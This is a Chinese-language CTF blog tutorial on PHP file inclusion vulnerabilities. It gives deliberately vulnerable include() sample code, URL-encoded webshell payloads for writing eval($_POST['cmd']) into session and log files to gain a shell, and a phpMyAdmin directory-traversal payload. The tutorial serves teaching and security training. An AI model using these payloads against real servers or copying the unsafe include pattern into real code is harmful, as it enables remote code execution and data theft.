【文件包含漏洞基本原理解析】

于 2024-05-03 17:54:53 发布
阅读量45 收藏 5
点赞数 5
分类专栏: CTF 文章标签: php linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45131319/article/details/138354636
版权

流程

一、文件包含原理

请添加图片描述
请添加图片描述

示例代码

文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制包含其他的恶意文件,导致执行了非预期的代码

<?php
	$filename = $_GET['filename'];
	include($filename);
?>

$_GET['filename']参数没有经过严格的过滤,直接带入了include函数,攻击者可以修改$_GET['filename']的值,执行非预期操作

二、本地文件包含漏洞

include

测试代码:

<?php
	$filename = $_GET['filename'];
	include($filename);
?>

$filename 参数可控

我们在C:\Windows\目录下新建一个test.txt,并在文件里面输入this is a test file。

当我们向filename传入路径文件时,由于这个文件是纯文本,服务器会向我们输出文件里面的内容
请添加图片描述
我们可以利用这个来包含服务器的敏感文件,以下是一些常见的敏感文件路径:
请添加图片描述

session

请添加图片描述
根据cookie中的session值,我们就可以找到服务器上的session文件

测试代码:

<?php
	session_start();
	$user = $_GET['user'];
	$_SESSION['username'] = $user;
?>

当我们向目标网站传入test时:

http://192.168.1.88/?user=test

我们的cookie中出现了对应的信息:
请添加图片描述
当我们去服务器上查找这个文件时,发现服务器上出现了对应的文件,且里面记录的字符串正是我们传入的信息:

请添加图片描述

可以看到我们的test被存储到session文件中,利用这点我们可以向session文件中写shell,通过包含session文件来getshell

http://192.168.1.88/index.php?user=%3C%3Fphp%20eval%28%24_POST%5Bcmd%5D%29%20%3F%3E

包含日志文件

请添加图片描述

测试代码:

<?php
	$f = $_GET['f'];
	include($f);
?>

当我们找到包含点时,只需要访问:

http://192.168.1.88/test.php?f=%3C%3Fphp%20eval%28%24_POST%5Bcmd%5D%29%20%3F%3E

向日志中写入shell,包含日志文件,即可getshell

phpMyAdmain 本地文件包含漏洞

请添加图片描述
具体绕过不细讲,我们只要知道是可以绕过的,利用payload:

http://localhost/index.php?target=db_sql.php%253f../../../../../../../flag

常见绕过手段

当然本地文件包含漏洞会有一些防护手段,我们总结了一些绕过手段:

url编码

请添加图片描述

路径长度截断

请添加图片描述

三、远程文件包含漏洞

请添加图片描述
测试代码:

<?php
	$filename = $_GET['filename'];
	include($filename);
?>

请添加图片描述

常见绕过手段

?绕过

请添加图片描述

#绕过

请添加图片描述

盖头盖
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
文件包含原理解释-require
05-13
不恰当的文件包含可能导致远程文件包含漏洞(RFI,Remote File Inclusion),攻击者可以通过构造恶意URL来包含远程服务器上的文件,甚至执行任意代码。因此,我们应该始终确保包含文件路径是可信的,并避免用户...
php文件包含session,session文件包含漏洞复现
weixin_34036075的博客
04-12 776
一、环境搭建文件包含漏洞测试代码 file.phpsession内容可控测试代码 session.php二、利用条件1、session存储位置可以获取可以通过phpinfo查看也可以通过猜测,例如linux默认存储在/var/lib/php/session目录下2、session可控当session可控时,就可以传入恶意代码3、知道session文件名session文件名的构造是sess_ ...
session文件包含漏洞详解
最新发布
永远是少年
12-14 1545
今天继续给大家介绍渗透测试相关知识,本文主要内容是session文件包含漏洞详解。 一、session文件包含简介 二、session文件包含实战
php文件包含session,CTF PHP文件包含--session
weixin_39522423的博客
04-12 820
PHP文件包含 Session首先了解一下PHP文件包含漏洞----包含session利用条件:session文件路径已知,且其中内容部分可控。姿势:php的session文件的保存路径可以在phpinfo的session.save_path看到。 常见的php-session存放位置:/var/lib/php/sess_PHPSESSID/var/lib/php/sess_PHPSESSID/t...
网络安全-文件包含漏洞原理、攻击及防御
关注网络安全、云原生安全
08-14 6032
目录 简介 类型 原理 攻击 防御 简介 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 类型 根据不同的配置环境,文件包含漏洞分为如下两种情况:1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击者更多的会包含一些固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。2.远程文件
本地文件包含漏洞详解
热门推荐
发哥微课堂
06-14 2万+
0x00:漏洞定义 在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。 文件包含分为两种,一种为本地文件包含,一种为远程文件包含,此篇记录本地文件包含。本地文件包含(Local File Include),简称 LFI。 0x01:涉及函数 文件包含在 php 中,涉及到的危险函数有四个,分别是 inclu...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
29.文件上传漏洞和IIS6.0解析漏洞及防御原理(二)1
08-03
文章通过实例和实践经验,为初学者提供了丰富的学习资源,强调了了解这些漏洞原理的重要性,以便于更好地进行防护。网络安全不仅需要理论知识,更需要实际操作和持续学习,以应对不断变化的威胁。对于网络安全爱好者...
解析漏洞源码
02-28
了解了漏洞原理后,我们来看看如何防止这些问题: 1. **严格验证文件类型**:在接收文件上传前,应严格检查文件的MIME类型和扩展名,确保它们符合预期的安全范围。 2. **存储安全**:上传的文件应存储在不可执行的...
Demo.rar_.NET文件解析工具_DEMO
09-24
1. **元数据解析**:.NET文件包含丰富的元数据,如类型定义、方法签名、属性信息等。工具可以读取并显示这些元数据,帮助开发者了解类结构和函数关系。 2. **IL代码查看**:用户可以通过工具查看IL代码,分析程序...
超详细本地文件包含漏洞详解(小白也能懂!)
weixin_39670937的博客
07-05 1489
为了防止代码重复,我们就有了,文件包含。很多网页如果要用到很多同样的函数,那么我们就可以使用这个文件包含函数,就避免了每个网页又去重复造轮子。 在index.php文件包含1.txt,而1.txt的内容是phpinfo(),include函数包含1.txt,就会把1.txt的内容当成php文件执行,不管后缀是什么。1.txt也好,1.xml也好,只要里面是php代码,然后有被include函数包含,那么就被当成PHP文件执行。 如果包含文件不存在,就会出现致命的错误,并报出绝对路径,然...
文件包含漏洞原理
m0_68019293的博客
03-29 7573
什么是文件包含漏洞 1:随着网站的业务的需求,程序开发人员一般希望代码更加灵活,所以将被包含文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含文件时,用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了文件包含漏洞。 经常见到的函数 1:include()当前使用该函数包含文件时,只有代码执行到include()函数时将文件包含起来,发生错误时给出一个警告,然后继续执行语句 2,include_once()功能和include()相同,区别当重复调
文件包含原理及本地文件包含漏洞演示
weixin_43534549的博客
05-12 627
理论: 一.文件包含漏洞概述 1.定义:文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序。当应用程序使用攻击者控制的变量构建可执行代码的路径时,文件包含漏洞会导致攻击者任意控制运行时执行的文件。 2.文件包含漏洞的出现及危害 文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序。当应用程序使用攻击者控制的变量构建可执行代码的路径时,文件包含漏洞会...
文件包含漏洞原理分析
weixin_30955341的博客
08-03 1197
文件包含这个漏洞,用我自己的话来说就是程序员在网站设计中,为方便自己在设计构架时,使用了一些包含的函数,就像'文件包含'这几个字的字面意思一样,在文件中,包含一个文件。 我在总结这篇文章的时候看了,其他人总结的,感觉别人总结的很是详细,就像一开始我只认为包含只有PHP代码中才存在,后来我再整理复习的时候,才发现,包含这个漏洞在各大语言中,都存在的,只不过现在大部分网站都是PHP网站,所以存在这个...
远程包含和本地包含漏洞原理
u010412301的博客
06-15 1191
远程包含和本地包含漏洞原理  首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。几乎所有的 cgi程序都有这样的 bug,只是具体的表现方式不一样罢了。 一、涉及到的危险函数〔include()
包含文件漏洞详解
xlh日记本
04-02 1301
作者:IceskYsl@1st来源:天马行空{1.S.T}(http://www.1steam.cn)/申明:本站原创,欢迎转载,请注明来源天马行空{1.S.T}(http://www.1steam.cn)/=============首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从
LFI 绕过 Session 包含限制 Getshell
qq_45521281的博客
06-10 1301
文章目录前言用户会话会话存储会话处理LFI SessionSession Base64EncodeBypass serialize_handler=phpBypass serialize_handler=php_serializeNo session_start()表单利用攻击Conclusion session文件包含漏洞就是在用户可以控制session文件中的一部分信息,然后将这部分信息变成我们的精心构造的恶意代码,之后去包含含有我们传入恶意代码的这个session文件就可以达到攻击效果。 前言 之
浅谈利用session绕过getshell
蚁景网安学院
06-01 495
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不等的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值